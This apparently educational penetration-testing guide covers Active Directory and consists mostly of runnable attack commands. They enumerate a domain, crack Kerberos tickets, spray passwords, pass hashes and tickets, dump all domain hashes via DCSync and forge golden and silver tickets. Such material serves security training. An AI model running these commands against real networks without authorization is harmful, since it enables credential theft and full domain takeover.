Active Directory (AD) is at the heart of most enterprise networks. Understanding how to enumerate and attack AD environments is essential for penetration testers. This guide covers fundamental AD concepts, enumeration techniques, and common attack paths.
Active Directory Basics
Active Directory is a directory service that stores information about network resources and enables centralized management of users, computers, and policies.
Key Components
- Domain Controller (DC): Server that hosts AD services
- Domain: Logical grouping of objects (users, computers)
- Forest: Collection of one or more domains
- Organizational Unit (OU): Container for organizing objects
- Group Policy (GPO): Centralized configuration management
Initial Enumeration
Domain Information
# Get domain name
echo %USERDOMAIN%
systeminfo | findstr Domain
# Get domain controller
nltest /dclist:domain.local
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local
# PowerShell
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-ADDomainUser Enumeration
# Net commands
net user /domain
net user username /domain
net group /domain
net group "Domain Admins" /domain
# PowerShell AD module
Get-ADUser -Filter * -Properties *
Get-ADUser -Filter * | Select Name,SamAccountName
Get-ADGroupMember "Domain Admins"
# LDAP queries with PowerView
Get-DomainUser
Get-DomainUser -Identity admin
Get-DomainGroup -Identity "Domain Admins"Computer Enumeration
# PowerShell
Get-ADComputer -Filter * | Select Name,DNSHostName
# PowerView
Get-DomainComputer
Get-DomainComputer -PingBloodHound
BloodHound visualizes AD relationships and identifies attack paths:
# Collect data with SharpHound
.\SharpHound.exe -c All
# Or PowerShell collector
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
# Start BloodHound
sudo neo4j start
bloodhound
# Import the zip file and analyzeCommon Attack Techniques
Kerberoasting
Request service tickets for accounts with SPNs, then crack offline:
# Find SPNs
setspn -T domain.local -Q */*
# Request tickets (Rubeus)
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Request tickets (Impacket)
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request
# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txtAS-REP Roasting
Target accounts with “Do not require Kerberos preauthentication”:
# Find vulnerable accounts
Get-DomainUser -PreauthNotRequired
# Get hashes (Rubeus)
.\Rubeus.exe asreproast /outfile:asrep.txt
# Get hashes (Impacket)
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip DC_IP
# Crack with hashcat
hashcat -m 18200 asrep.txt wordlist.txtPassword Spraying
# Spray single password across users
crackmapexec smb DC_IP -u users.txt -p 'Password123' --continue-on-success
# Kerbrute
./kerbrute passwordspray -d domain.local users.txt Password123
# Check lockout policy first!
net accounts /domainPass-the-Hash
# Use NTLM hash instead of password
impacket-psexec domain.local/admin@target -hashes :NTLM_HASH
impacket-wmiexec domain.local/admin@target -hashes :NTLM_HASH
impacket-smbexec domain.local/admin@target -hashes :NTLM_HASH
# CrackMapExec
crackmapexec smb target -u admin -H NTLM_HASHPass-the-Ticket
# Export tickets (Mimikatz)
sekurlsa::tickets /export
# Import ticket
kerberos::ptt ticket.kirbi
# Rubeus
.\Rubeus.exe ptt /ticket:ticket.kirbiDCSync
If you have replication rights, dump all password hashes:
# Mimikatz
lsadump::dcsync /domain:domain.local /user:Administrator
# Impacket
impacket-secretsdump domain.local/admin:password@DC_IPLateral Movement
# PSExec
impacket-psexec domain.local/admin:password@target
# WMI
impacket-wmiexec domain.local/admin:password@target
# WinRM
evil-winrm -i target -u admin -p password
# PowerShell remoting
Enter-PSSession -ComputerName target -Credential domain\adminPersistence
Golden Ticket
# Need krbtgt hash (from DCSync)
# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /pttSilver Ticket
# Need service account hash
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:HASH /pttSummary
Active Directory penetration testing requires understanding both the technology and common misconfigurations. Start with enumeration using BloodHound to identify attack paths, then work through Kerberoasting, credential attacks, and lateral movement. Always document your findings and the attack chain used to compromise the domain.
